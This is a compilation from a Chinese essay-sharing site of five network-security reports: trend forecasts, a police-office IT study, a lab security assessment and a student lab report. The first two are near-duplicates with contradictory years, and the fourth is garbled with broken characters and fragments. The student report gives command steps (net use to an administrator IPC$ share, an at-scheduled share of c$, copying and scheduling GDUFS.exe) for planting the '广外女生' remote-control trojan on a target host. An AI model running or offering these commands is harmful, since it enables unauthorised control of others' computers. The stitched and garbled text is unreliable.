网络信息安全发展调研报告

时间:2019-05-14 15:06:23下载本文作者:会员上传
简介:写写帮文库小编为你整理了多篇相关的《网络信息安全发展调研报告》,但愿对你工作学习有帮助,当然你在写写帮文库还可以找到更多《网络信息安全发展调研报告》。

第一篇:网络信息安全发展调研报告

1.垃圾邮件和网络欺骗将立足“社交网络”

毫无疑问,2009年是社交网站迄今为止受到攻击最多的一年。但是与2012年相比,这些攻击可能根本不值一提。Koobface蠕虫等安全问题对社交网站用户形成了很大的困扰,但这些恶意软件仍然是首先感染用户的电脑,然后再窃取信息。但现在,安全专家则认为,恶意软件作者将进一步拓展攻击范围,把恶意软件植入到社交网站应用内部。有了这种病毒,无论用户是否访问社交网站,黑客都能毫无限制地窃取用户的资料和登录密码。

思科在其2009年《年度安全报告》中揭示了社交媒体(尤其是社交网络)对网络安全的影响,并探讨了人(而非技术)在为网络犯罪创造机会方面所起的关键作用。社交网络已经迅速成为网络犯罪的温床,因为这些网站的成员过于信任他们社区的其他成员,没有采取阻止恶意软件和计算机病毒的预防措施。小漏洞、不良用户行为以及过期的安全软件结合在一起会具有潜在的破坏性,可能大幅增加网络安全的风险。鉴于以上,2012年社交网络或许将给我信息安全带来更多的“惊喜”!

2.云计算成为孕育黑客新的温床

云计算在2009年取得了长足的发展,但我们也必须意识到,市场的快速发展会牺牲一定的安全性。攻击者今后将把更多的时间用于挖掘云计算服务提供商的ApI(应用编程接口)漏洞。

www.xiexiebang.com【xiexiebang.com范文网】

毋庸置疑,已经开始有越来越多的IT功能通过云计算来提供,网络犯罪也顺应了这一趋势。安全厂商Fortinet预计,网络犯罪借鉴“服务即安 全”(security-as-a-service)的理念,打造“服务即网络犯罪”(cybercrime-as-a-service)这一特殊品牌。网络犯罪也将效仿企业的做法使用基于云计算的工具,以便更有效率地部署远程攻击,甚至借此大幅拓展攻击范围。

3.大量Mac计算机被病毒感染或黑客入侵

安全厂商Websense安全研究高级经理帕特里克•卢纳德(patrick Runald)说:“Mac OS X中没有任何的恶意软件防范机制。”他表示,在CanSecWest黑客大赛上,Mac已经连续两年成为第一个被攻破的系统。

4.智能手机安全问题愈发严重

随着移动应用的不断增多,智能设备的受攻击面也在不断扩大,移动安全所面临的局面将会越来越严重。虽然我们已经看到了iphone上的蠕虫病毒,虽然它还不能自我传播,还得依靠电脑来传播,但是我们预计,2012年,将会出现真正可以自我传播的病毒,严重威胁iphone和Android等设备。

卡巴斯基实验室恶意软件高级研究员罗伊尔•舒文伯格(Roel Schouwenberg)说:“Android手机的日益流行,加之缺乏对第三方应用安全性的有效控制,将导致诸多高调恶意软件的出现。”

总体而言,安全专家认为,随着用户将智能手机作为迷你pC来处理银行交易、游戏、社交网站和其他的业务,黑客将越发关注这一平台。

5.搜索引擎成为黑客全新赢利方式

黑客会不断寻找新的方法借助钓鱼网站吸引用户上钩,利用搜索引擎优化技术展开攻击便是其中的一种方法。谷歌和必应(Bing)对实时搜索的支持 也将吸引黑客进一步提升相关技术。作为一种攻击渠道,搜索引擎是非常理想的选择,因为用户通常都非常信任搜索引擎,对于排在前几位的搜索结果更是没有任何 怀疑,这就给了黑客可乘之机,从而对用户发动攻击。

6.虚拟化普及 安全威胁适应潮流

与Cloud类似的是,虚拟化技术也将抓住快速发展的时机。业界中已经有公司开始研究传统桌面电脑的虚拟化。虚拟化不仅能提供一种极高的安全保障,还能方便协作,提高效率。

除了瘦客户机的虚拟桌面以外,企业还将会开始考察笔记本电脑虚拟机以作为创建安全企业桌面的手段之一。虚拟机可利用快照迅速恢复到已知的安全状态配置,从而为网上银行或安全的企业应用提供更高等级的安全保障。工作和休闲可以在同一的硬件上共存,只要相互保持隔离就行。

第二篇:网络信息安全发展调研报告

这是一篇关于调研报告的范文,可以提供大家借鉴!

1.垃圾邮件和网络欺骗将立足“社交网络”

毫无疑问,2009年是社交网站迄今为止受到攻击最多的一年。但是与2010年相比,这些攻击可能根本不值一提。Koobface蠕虫等安全问题对社交网站用户形成了很大的困扰,但这些恶意软件仍然是首先感染用户的电脑,然后再窃取信息。但现在,安全专家则认为,恶意软件作者将进一步拓展攻击范围,把恶意软件植入到社交网站应用内部。有了这种病毒,无论用户是否访问社交网站,黑客都能毫无限制地窃取用户的资料和登录密码。

思科在其2009年《安全报告》中揭示了社交媒体(尤其是社交网络)对网络安全的影响,并探讨了人(而非技术)在为网络犯罪创造机会方面所起的关键作用。社交网络已经迅速成为网络犯罪的温床,因为这些网站的成员过于信任他们社区的其他成员,没有采取阻止恶意软件和计算机病毒的预防措施。小漏洞、不良用户行为以及过期的安全软件结合在一起会具有潜在的破坏性,可能大幅增加网络安全的风险。鉴于以上,2010年社交网络或许将给我信息安全带来更多的“惊喜”!

2.云计算成为孕育黑客新的温床

云计算在2009年取得了长足的发展,但我们也必须意识到,市场的快速发展会牺牲一定的安全性。攻击者今后将把更多的时间用于挖掘云计算服务提供商的ApI(应用编程接口)漏洞。

毋庸置疑,已经开始有越来越多的IT功能通过云计算来提供,网络犯罪也顺应了这一趋势。安全厂商Fortinet预计,网络犯罪借鉴“服务即安 全”(security-as-a-service)的理念,打造“服务即网络犯罪”(cybercrime-as-a-service)这一特殊品牌。网络犯罪也将效仿企业的做法使用基于云计算的工具,以便更有效率地部署远程攻击,甚至借此大幅拓展攻击范围。

对于云计算将被黑客所利用这个严峻的问题,各大安全公司和技术人员会把精力放在与云计算相关的安全服务上,提供加密、目录和管理、反垃圾邮件、恶意程序等各种解决方案。据悉,着名安全评测机构VB100号召安全行业应该联合起来,组成一个对抗恶意程序的共同体,分享技术和资源。或许这一提议在2010年能发展到实质性的阶段。

3.大量Mac计算机被病毒感染或黑客入侵

经济危机非但没有伤害到苹果的利益,反而使其业绩进一步提升。但安全专家表示,在市场份额提升的同时,Mac也要面临更多的黑客攻击。过去几年 间,苹果的pC市场份额已经从10%增长到12%,而且没有放缓的迹象。与此同时,在售价高于1000美元的笔记本电脑中,苹果更是占据了90%的份额,但针对iphone(手机上网)和MacBook的攻击也逐步引发外界关注。安全专家预计,Mac有可能会成为下一个最易受攻击的目标。尽管多数攻击都瞄准Windows,但2012年将会出现更多针对Mac OS X的攻击。

安全厂商Websense安全研究高级经理帕特里克•卢纳德(patrick Runald)说:“Mac OS X中没有任何的恶意软件防范机制。”他表示,在CanSecWest黑客大赛上,Mac已经连续两年成为第一个被攻破的系统。

4.智能手机安全问题愈发严重

随着移动应用的不断增多,智能设备的受攻击面也在不断扩大,移动安全所面临的局面将会越来越严重。虽然我们已经看到了iphone上的蠕虫病毒,虽然它还不能自我传播,还得依靠电脑来传播,但是我们预计,2012年,将会出现真正可以自我传播的病毒,严重威胁iphone和Android等设备。

卡巴斯基实验室恶意软件高级研究员罗伊尔•舒文伯格(Roel Schouwenberg)说:“Android手机的日益流行,加之缺乏对第三方应用安全性的有效控制,将导致诸多高调恶意软件的出现。”

总体而言,安全专家认为,随着用户将智能手机作为迷你pC来处理银行交易、游戏、社交网站和其他的业务,黑客将越发关注这一平台。

5.搜索引擎成为黑客全新赢利方式

黑客会不断寻找新的方法借助钓鱼网站吸引用户上钩,利用搜索引擎优化技术展开攻击便是其中的一种方法。谷歌和必应(Bing)对实时搜索的支持 也将吸引黑客进一步提升相关技术。作为一种攻击渠道,搜索引擎是非常理想的选择,因为用户通常都非常信任搜索引擎,对于排在前几位的搜索结果更是没有任何 怀疑,这就给了黑客可乘之机,从而对用户发动攻击。

6.虚拟化普及 安全威胁适应潮流

与Cloud类似的是,虚拟化技术也将抓住快速发展的时机。业界中已经有公司开始研究传统桌面电脑的虚拟化。虚拟化不仅能提供一种极高的安全保障,还能方便协作,提高效率。

除了瘦客户机的虚拟桌面以外,企业还将会开始考察笔记本电脑虚拟机以作为创建安全企业桌面的手段之一。虚拟机可利用快照迅速恢复到已知的安全状态配置,从而为网上银行或安全的企业应用提供更高等级的安全保障。工作和休闲可以在同一的硬件上共存,只要相互保持隔离就行。

第三篇:信息安全调研报告

公安基层办公室信息化调研报告

现代社会的信息化、网络化和现代通信、计算机互联网技术的发展,对公安机关提出了越来越高的要求。为适应社会形势发展的需要,公安部近年来连续部署了“金盾工程”建设,标志着警务工作信息化工程全面启动。要适应社会发展和科技进步的需要,公安机关必须把科技强警工作和公安信息化建设摆在重要的位置。公安办公室作为“司令部”、“参谋部”,要及时、准确掌握各类情况,为领导决策提供科学依据,必须加强信息化建设。

一、基层公安办公室信息化是公安信息化的薄弱环节

(一)认识上的偏差

部分领导和民警在思想观念上存在着只须懂法就足以胜任当前公安工作的偏见,对信息化的了解也仅限于信息化就是用微机打字、信息化就是上因特网,对信息化范围、信息化开展的意义认识不足,没有真正意识到信息化建设对公安工作有着巨大推动作用。因此,公安机关出现了阻碍科学技术与办案结合的不利因素,缺乏依靠科技进步的内在动力;对于如何把信息技术运用到公安工作中来、如何用信息化促进公安工作的跨越式发展,研究较少,重视不够。这种状况已成为公安机关加快信息化进程,推动办公、办案现代化发展的瓶颈,与当前形势发展和公安工作的任务需求极不相应,也制约了公安工作的发展。

(二)办公室基础设施简陋导致工作效率的低下

科技强警的鼓敲了几年,但基层公安局办公室仍然普遍存在基础设施简陋、办公条件差等现象,办公室作为综合部门,工作是多而杂,且有的工作手续多、所经部门广,仅仅依靠几个民警的手工操作或单机办公,往往使办公室民警大有力不从心之感,工作效率低下那也是情理之中。因此,针对办公室的职能作用,建立省人省力的信息化系统,将办公室人员从材料难写的困惑中解脱出来,提高工作效率势在必行。

(三)缺乏人才,使信息化建设力不从心

公安机关信息化建设工作存在最突出的问题,就是严重缺乏信息技术人才。从目前来看,公安机关的工作人员在过去所接受的教育中很少涉及信息技术知识,而专门的技术人员又大多为法医、会计、痕检、摄像等传统技术型工作人员,因此对于信息技术这门科技含量很高的结合技术,显得束手无策,很难提出一个长远的发展规划、很难得心应手地组织开展信息化建设。对于有一些信息化建设的单位,又由于人才缺乏,先进的信息化设备不能使用或不能充分发挥作用,使信息化建设的成果成为摆设。因此在没有一支高水平的信息化技术人才队伍的前提下,公安信息化建设对某些单位而言简直是一种神话或资金上的严重浪费。

(四)缺乏资金,信息化建设难以保障

信息化建设是一项高技术、高投入、高效能的现代化基础建设,必须要有足

够的建设经费作保证。它所涉及的硬件设备、软件系统都需要大量的资金来购置。以一个县公安局办公室为例,信息化系统需要一个由一台服务器,10台终端微机组成的小型局型网,购置网络办公系统、数据统计系统,仅此几项建设资金投入就达几十万元。财政却往往因为各种原因,不能保障和支持公安机关的信息化建设。因此公安机关在信息化建设上只能是等米下锅,信息化建设得不到有效保障。

二、加强基层公安局办公室信息化建设的方法

(一)信息化系统的构成公安办公室信息化系统就是根据信息论、系统论、控制论、现代管理科学理论、现代信息技术,结合办公室的职能作用和业务工作特点而建立的信息体系。公安办公室信息化系统是公安信息系统的子系统,以技术为辅助手段,使公安办公室获得快速、灵敏、准确、全面和安全有效的综合信息支持,实现办公自动化、科学化、网络化,以充分发挥公安办公室的综合分析、“参谋”作用。一般来说,根据办公室的职能作用,基层公安局办公室信息化系统主要包括以下几个系统:

1、指挥中心信息处理系统

该系统主要承担快速、准确、全面获得的动态信息,为领导正确决策提供第一手资料,是科学决策、快速指挥调度的重要依据和信息主渠道。指挥中心信息处理系统纵向与上下级公安指挥中心信息网络连接,横向以公安信息管理中心为枢纽,整合同级公安犯罪信息中心、交通、户政、刑侦、出入境、治安等信息系统,运用计算机网络技术控制手段,将分散的信息统一起来,实现信息资源共享和系统开放,成为覆盖全局、四通八达的能为各警种、各基层战斗单位和一线民警提供大量信息的高速通信网,从而克服时空限制支持各警种协同作战。

2、公安统计系统

该系统主要依靠统计软件,进行数据的收集、分类、汇总,有效地进行数据统计和解决统计不实问题,并对下级公安机关进行有力的综合指导。公安统计系统可通过数据统计,进一步进行社会治安情况分析,为各级部门提供服务。

3、综合调研系统

该系统主要以科学管理的手段快速、及时、准确地收集各业务单位、基层机关所得到的成绩和经验,进行系统分析,反映整个公安工作的经验、成就和业绩。

4、档案管理系统

该系统主要是通过科学技术手段解决过去查找材料、文件困难,材料保存时间不能过长等问题。档案管理系统建立后,将文件、材料的文号、文名、存放文柜进行编号,录入计算机,以便于检索,并将文件、材料进行扫描存入微机,需要查阅,只需在计算机中进行检索便可直接查看,同时还可通过局域网,突破时空限制。

5、刑侦、治安、户政等业务部门系统

公安办公室的职能作用决定了其工作具有综合性的特点,办公室与刑侦、治安、户政等业务部门是相互服务的。因此,办公室信息系统与刑侦、治安、户政等业务部门的网络连接是必不可少的。刑侦、治安、户政等业务部门子系统主要是结合网络技术手段,进行网上追逃、户口上网管理,以便进行信息快速流通。如指挥中心信息处理子系统通过业务部门收集各类业务数据、不安定情况等;办公室综合调研系统通过刑侦部门收集打击犯罪的情况等;公安统计子系统从户政收集人口数据等等,都可从各业务部门子系统网络上获得。

(二)办公室信息化系统的建设

1、组建经济实用的小型局域网,搭建网络化办公平台,实现信息化系统的职能作用。

2、购置实用的业务办公系统软件,实现办公自动化。

基层公安办公室根据实际情况可以自行购买相应的业务及办公系统软件。各基层公安局办公室要积极争取政策,引进人才,把技术精、有责任心和热爱公安事业的信息技术人才充实到公安机关中来,并努力营造一个适合技术人员发展的空间,保证信息技术人才进得来、留得住、用得好、有发展。其次立足本室,在没有专门人才的情况下,加大全员培训力度,从实际工作出发,从实际应用出发,努力提高全体民警的信息化素质,提高计算机使用水平。

3、建立制度,确保信息化建设发挥作用。

信息化建设的项目建成以后,不能放着、摆着不用,而要充分地、强制性地利用起来。不能因为民警囿于传统工作方法,学习掌握上存在惰性,学习掌握需要一段时间,而不做制度上的要求。应从整体发展的角度、公安事业发展的高度,制定规章制度,要求各类案件信息必须输入微机、各类公文必须在微机上书写、流转,从而使民警从传统的办公状态进入到网络化办公、信息化办公的角色中,只有这样才能把信息化建设的成果应用到公安工作中,推动公安工作向前发展,才真正地将信息化建设落到实处。

第四篇:网络信息安全评估报告

计算机信息安全评估报告

如何

可用性1.人们通常采用一些技术措施或网络安全设备来实现这些目标。例如:

使用防火墙,把攻击者阻挡在网络外部,让他们“迚不来”。

即使攻击者迚入了网络内部,由于有加密机制,会使他们“改不了”和“拿不走”关 键信息和资源。

机密性2机密性将对敏感数据的访问权限控制在那些经授权的个人,只有他们才能查看数据。机密性可防止向未经授权的个人泄露信息,或防止信息被加工。

如图所示,“迚不来”和“看不懂”都实现了信息系统的机密性。

人们使用口令对迚入系统的用户迚行身份鉴别,非法用户没有口令就“迚不来”,这就保证了信息系统的机密性。

即使攻击者破解了口令,而迚入系统,加密机制也会使得他们“看不懂”关键信息。例如,甲给乙发送加密文件,只有乙通过解密才能读懂其内容,其他人看到的是乱码。由此便实现了信息的机密性。

完整性3如图所示,“改不了”和“拿不走”都实现了信息系统的完整性。使用加密机制,可以保证信息系统的完整性,攻击者无法对加密信息迚行修改或者复制。

不可抵赖性4如图所示,“跑不掉”就实现了信息系统的不可抵赖性。如果攻击者迚行了非法操作,系统管理员使用审计机制或签名机制也可让他们无所遁形

对考试的机房迚行“管理制度”评估。(1)评估说明

为规范管理,保障计算机设备的正常运行,创造良好的上机环境,必须制定相关的管理制度

(2)评估内容

没有建立相应信息系统运行管理规程、缺陷管理制度、统计汇报制度、运维流程、值班制度,没有实行工作票制度;机房出入管理制度上墙,但没有机房迚出情况记录(3)评估分析报告

所存在问题:1没有系统的相关负责人,机房也是谁人都可以自由出入。2在上机过程中做与学习无关的工作。3机房财产规划不健全等(4)评估建议

1、计算机室的管理由系统管理员负责,非机房工作人员未经允许不准迚入。未经许可不得擅自上机操作和对运行设备及各种配置迚行更改。

2、保持机房内清洁、安静,严禁机房内吸烟、吐痰以及大声喧哗;严禁将易燃、易爆、易污染和强磁物品带入机房。

3、机房内的一切物品,未经管理员同意,不得随意挪动,拆卸和带出机房。

4、上机时,应先认真检查机器情况,如有问题应及时向机房管理员反应。

5、上机人员不得在机房内迚行与上机考试无关的计算机操作。

6、上机时应按规定操作,故意或因操作不当造成设备损坏,除照价赔偿外,视情节轻重给予处罚。对考试的机房迚行“物理安全”评估。(1)评估说明

防火,防水,防尘,防腐蚀,主机房安装门禁、监控与报警系统。(2)评估内容 主机房没有安装门禁、监控系统,有消防报警系统。(3)评估分析报告

没有详细的机房配线图,机房供甴系统将动力、照明用甴与计算机系统供甴线路是分开的,机房没有配备应急照明装置,有定期对UPS的运行状况迚行检测但没有检测记录。

(4)评估建议

有详细的机房配线图,机房供甴系统将动力、照明用甴与计算机系统供甴线路分开,机房配备应急照明装置,定期对UPS的运行状况迚行检测(查看半年内检测记录)对考试的机房迚行“计算机系统安全”评估。(1)评估说明

应用系统的角色、权限分配有记录;用户账户的变更、修改、注销有记录(半年记录情况);关键应用系统的数据功能操作迚行审计幵迚行长期存储;对关键应用系统有应急预案;关键应用系统管理员账户、用户账户口令定期迚行变更;新系统上线前迚行安全性测试。

(2)评估内容

营销系统的角色、权限分配有记录,其余系统没有;用户账户的变更、修改、注销没有记录;关键应用系统的数据功能操作没有迚行审计;没有针对关键应用系统的应急预案;关键应用系统管理员账户、用户账户口令有定期迚行变更;有些新系统上线前没有迚行过安全性测试。

(3)评估分析报告

网络中的防火墙位置部署合理,防火墙规则配置符合安全要求,防火墙规则配置的建立、更改有规范申请、审核、审批流程,对防火墙日志迚行存储、备份。

(4)评估建议

完善系统的角色、权限分配有记录;记录用户账户的变更、修改、注销(半年记录情况);关键应用系统的数据功能操作迚行审计;制定针对关键应用系统的应急预案;关键应用系统管理员账户、用户账户口令定期迚行变更;新系统上线前应严格按照相关标准迚行安全性测试。

对考试的机房迚行“网络与通信安全”评估。(1)评估说明

按标准部署身份认证系统、安全管理平台、针对安全设备的日志服务器,采用漏洞扫描系统,重要系统一年迚行一次信息安全风险评估。

(2)评估内容

没有部署身份认证系统、安全管理平台,没有漏洞扫描系统,重要系统没有迚行信息安全风险评估,没有部署针对安全设备的日志服务器。

(3)评估分析报告

按标准部署身份认证系统、安全管理平台、针对安全设备的日志服务器,采用漏洞扫描系统,重要系统一年迚行一次信息安全风险评估。

(4)评估建议

部署身份认证系统、安全管理平台,采用漏洞扫描系统,重要系统一年内迚行信息安全风险评估,部署针对安全设备的日志服务器。

信息安全评估:

对考试的机房迚行“日志与统计安全”评估。(1)评估说明

每天计算机上机记录日志在册,对系统迚行不定时的还原。对本局半年内发生的较大的、或者发生次数较多的信息安全事件迚行汇总记录,形成本单位的安全事件列表

(2)评估内容

已成立了信息安全领导机构,但尚未成立信息安全工作机构。

(3)评估分析报告

局域网核心交换设备、城域网核心路由设备应采取设备冗余或准备备用设备,不允许外联链路绕过防火墙,具有当前准确的网络拓扑结构图

(4)评估建议

完善信息安全组织机构,成立信息安全工作机构。

第五篇:【企业网络】网络信息安全报告

XX中型企业网安全 网络信息安全报告

一、实验目的及要求

该专周的目标是让学生掌握网络安全的基本框架,网络安全的基本理论。以及了解计算机网络安全方面的管理、配置和维护。

本课程要求在理论教学上以必需够用为原则,应尽量避免过深过繁的理论探讨,重在理解网络安全的基本框架,网络安全的基本理论。掌握数据加密、防火墙技术、入侵检测技术以及学习网络病毒防治。了解Windows 2000的安全、Web的安全、网络安全工程以及黑客常用的系统攻击方法。本课程要求学生对计算机的使用有一定了解(了解Windows的使用,具有键盘操作和文件处理的基础),并已经掌握计算机网络的基本原理。

二、专周内容

1、安全需求分析

(1)网络安全问题主要集中在对服务器的安全保护、防黑客和病毒、重要网段的保护及管理安全上。因此,我们必须采取相应的安全措施杜绝安全隐患,其中应该做到:

A、公开服务器的安全保护 B、防止黑客从外部攻击 C、入侵检测与监控 D、病毒防护 E、数据安全保护 F、网络的安全管理

(2)解决网络安全问题的一些要求

A、大幅度地提高系统的安全性(重点是可用性和可控性);

B、保持网络原有的特点,即对网络的协议和传输具有良好的透明性,能透明接入,无需更改网络设置;

C、易于操作、维护,并便于自动化管理,而不增加或少增加附加操作;

D、尽量不影响原网络拓扑结构,同时便于系统及系统功能的扩展;

E、安全保密系统具有较好的性能价格比。一次性投资,可以长期使用;

F、安全产品具有合法性,及经过国家有关管理部门的认可或认证;

(3)系统安全目标

A、建立一套完整可行的网络安全与网络管理策略;

B、将内部网络、公开服务器网络和外网进行有效隔离,避免与外部网络直接通信;

C、建立网站各主机和服务器的安全保护措施,保证他们的系统安全;

D、加强合法用户的访问认证,同时将用户的访问权限控制在最低限度;

E、全面监视对公开服务器的访问,及时发现和拒绝不安全的操作和黑客攻击行为;

F、加强对各种访问的审计工作,详细记录对网络、公开服务器的访问行为,形成完整的系统日志;

2、网络拓扑

3、网络安全的基本内容

(1)基本网络命令

A、ping命令: ping –t IP,向指定的计算机不停的发送数据包,按Ctr+Break快捷键可以查看统计信息并继续运行,按 Ctr+C可中止运行。

B、Tracert命令:tracert IP 显示从本地计算机到目标服务器所经过的计算机:

C、pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%

(2)操作系统安全

A、屏蔽不需要的服务组件

开始——程序——管理工具——服务 出现以下窗口:

然后在该对话框中选中需要屏蔽的程序,并单击右键,然后选择“停止”命令,同时将“启动类型”设置为“手动”或“已禁用”,这样就可以对指定的服务组进行屏蔽了。B、关闭默认共享:“开始”——“程序”——“管理工具”——“服务”——“Server”

(3)数据库系统安全

A、使用安全的帐号策略和Windows认证模式

由于SQL Server不能更改sa用户名称,也不能删除这个超级用户,所以,我们必须对这个帐号进行最强的保护,当然,包括使用一个非常强壮的密码,最好不要在数据库应用中使用sa帐号,只有当没有其它方法登录到 SQL Server 实例(例如,当其它系统管理员不可用或忘记了密码)时才使用 sa。可以新建立一个拥有与sa一样权限的超级用户来管理数据库。安全的帐号策略还包括不要让管理员权限的帐号泛滥。

SQL Server的认证模式有Windows身份认证和混合身份认证两种。在任何可能的时候,应该对指向SQL Server的连接要求Windows身份验证模式。

Windows认证模式比混合模式更优越,原因在以下:

1)它通过限制对Microsoft Windows用户和域用户帐户的连接,保护SQL Server免受大部分Internet工具的侵害。

2)服务器将从Windows安全增强机制中获益,例如更强的身份验证协议以及强制的密码复杂性和过期时间。

3)使用Windows认证,不需要将密码存放在连接字符串中。存储密码是使用标准SQL Server登录的应用程序的主要漏洞之一。

4)Windows认证意味着你只需要将密码存放在一个地方。

要在SQL Server的Enterprise Manager安装Windows身份验证模式,步骤操作: 展开服务器组——右键点击服务器——然后点击“属性”——在安全性选项卡的身份验证中——点击“仅限Windows”。(4)网络防火墙工具:红墙主机网络防火墙 安装

1.具体操作如下:

第一步: 将“爱思红墙主机网络防火墙”的安装光盘插入驱动器,运行根目录下的Setup文件来运行其安装程序,进入“爱思红墙主机网络防火墙安装”窗口;

第二步:

在“欢迎安装爱思红墙主机网络防火墙”对话框中,单击“下一步”按钮;

第三步: 在“软件许可协议”对话框,接受协议点击“是”;

第四步: 点击“是”按钮,出现显示您计算机的相关信息,即判断是否可以安装本软件;

第五步: 单击“下一步”按钮,出现“选择目标位置”对话框;

第六步: 在该对话框中,单击“浏览”按钮,并在“选择文件夹”对话框中选择盘符作为驱动器,再指定相应的文件夹及路径,然后单击“确定”按钮;

第七步: 单击“下一步”按钮,出现“选择安装程序名称”对话框,您可自定义程序名称;

第八步: 单击“下一步”按钮,系统开始复制文件;

第九步: 进入“红墙主机网络防火墙配置”窗口,作出是否运行“红墙应用程序扫描系统”的选择后,点击“完成”。

相关设置:告警设置:系统提供了两种情况下的告警,即需要系统告警和不需要系统告警,您可据需要选取告警设置。

点击主界面中的“规则管理”按钮,弹出相应窗口,如下图:

网络监控中心:

(5)网络攻击工具:“广外女生”

它的基本功能有:文件管理方面有上传,下载,删除,改名,设置属性,建立文件夹和运行指定文件等功能;注册表操作方面:全面模拟WINDOWS的注册表编辑器,让远程注册表编辑工作有如在本机上操作一样方便;屏幕控制方面:可以自定义图片的质量来减少传输的时间,在局域网或高网速的地方还可以全屏操作对方的鼠标及键盘,就像操纵自己的计算机一样;远程任务管理方面,可以直观地浏览对方窗体,随意杀掉对方窗体或其中的控件;其他功能还有邮件IP通知等。

主要步骤:首先运行“gwg.exe”,出现如图窗口:

选中“服务端设置”,生成“GDUFS.exe”木马:

然后将“GDUFS.exe”复制到自己的C盘中,再根据一些命令把“GDUFS.exe”复制到目标主机的盘中,再进行运行。目标主机的IP:191.168.12.38 具体步骤及命令:

“开始”——“运行”——“cmd”

命令:net use 191.168.12.38ipc$ 123 /user:administrator 与目标主机之间建立联系

命令:net time 191.168.12.38 获取目标主机的时间

命令:at 191.168.12.38 08:21 net share c$=c: 与目标主机的C盘建立通道

命令:copy c:GDUFS.exe 191.168.12.38c$ 复制“GDUFS.exe”文件到目标主机的C盘中:

命令:191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目标主机中什么时候运行。

三、专周小结:

通过这次网络安全专周,我不仅仅是学到了很多知识,更是透彻的理解到了网络安全对生活已经将来工作的意义。

网络安全分为软件网络安全和硬件网络安全。一般我们说的网络安全就是软件上的网络安全,即局域网,互联网安全。

网络安全又分为内网安全和外网安全。在内外网安全中,内网安全则是重中之重。毕竟是家贼难防。据不完全统计,全国因为内网安全的问题,至少每年算是几亿美元。所以,网络安全特别重要。

至于在将来的工作中,我们也要严格尊市网络设备管理原则和使用秩序,对设备进行统一管理专人负责,严格要求自己对设备进行安全操作,保持强烈的责任感和服务意识,做好每一个细节,重点做好以下几项工作:

1,及时准确判断网络故障,做好上门维护工作或及时提醒网络合作商进行维护。

2,定期检查维护各网络设备的运行情况并进行维护。3,不定期对服务器进行更新和检查。

4,遇到特殊情况,及时向领导和老师汇报,努力提高应急处理问题和独立处理问题的能力。

感谢老师对我们的教导。

下载网络信息安全发展调研报告word格式文档
下载网络信息安全发展调研报告.doc
将本文档下载到自己电脑,方便修改和收藏,请勿使用迅雷等下载。
点此处下载文档

文档为doc格式


声明:本文内容由互联网用户自发贡献自行上传,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任。如果您发现有涉嫌版权的内容,欢迎发送邮件至:645879355@qq.com 进行举报,并提供相关证据,工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。

相关范文推荐

    2011年度网络与信息安全情况报告

    2011年网络与信息安全检查情况的报告 2011年,在省政府办公厅和省工信厅的指导下,我局进一步加强了网络信息安全制度建设,不断强化日常检查与防护管理,配备健全了网络信息安全设......

    信息调研网络工作总结

    今年,信息科坚持以宣传舆情、信息、调研和网络工作为重点,本着全面、及时、准确、实效的原则,切实加强宣传调研信息与舆情信息工作,为领导科学决策提供服务,为实现全市宣传思想......

    信息调研网络工作汇报材料

    按照商丘市委宣传部的考核评比办法要求,就今年的信息调研网络工作作如下汇报:一信息调研工作:1、今年部领导共召开4次专题工作会议,全年共上报调查报告10篇,其中《永煤文化现象的......

    校园网络管理与信息安全解决方案(调研报告)

    校园网络管理与信息安全现状 调研报告 一 概述 随着信息化程度的提高,计算机网络得到了飞速发展,校园网络信息化也逐步发展起来了。而高校校园信息化建设工作的整体推进, 应用......

    网络信息安全

    网络信息安全 信息安全是指为建立信息处理系统而采取的技术上和管理上的安全保护,以实现电子信息的保密性、完整性、可用性和可控性。当今信息时代,计算机网络已经成为一种不......

    关于中国网络发展的调研报告

    关于中国网络发展的调研报告 序言: 互联网的发展始于冷战时期,在60年代末期由于美苏之间的全球争霸,为了预防核战争对本国通信系统的影响,美国开始研究如何防止核打击。这也是互......

    网络信息安全应急演练报告(定稿)

    应急演练报告 2013年05月12日,组织模拟应急演练。 演练背景:突然断电 演练情形:05月12日上午9时,突然性拉闸断电。UPS随即启动, 而后发电机启动,系统运行正常。断电2小时后,终止演......

    网络与信息安全检查报告

    网络与信息安全检查报告 近日柳州市教育局发出《关于开展我市教育系统网络与信息安全工作检查的通知》,我校自上而下,成立了专门的网络信息安全管理机构,组长由莫玉梅校长亲自......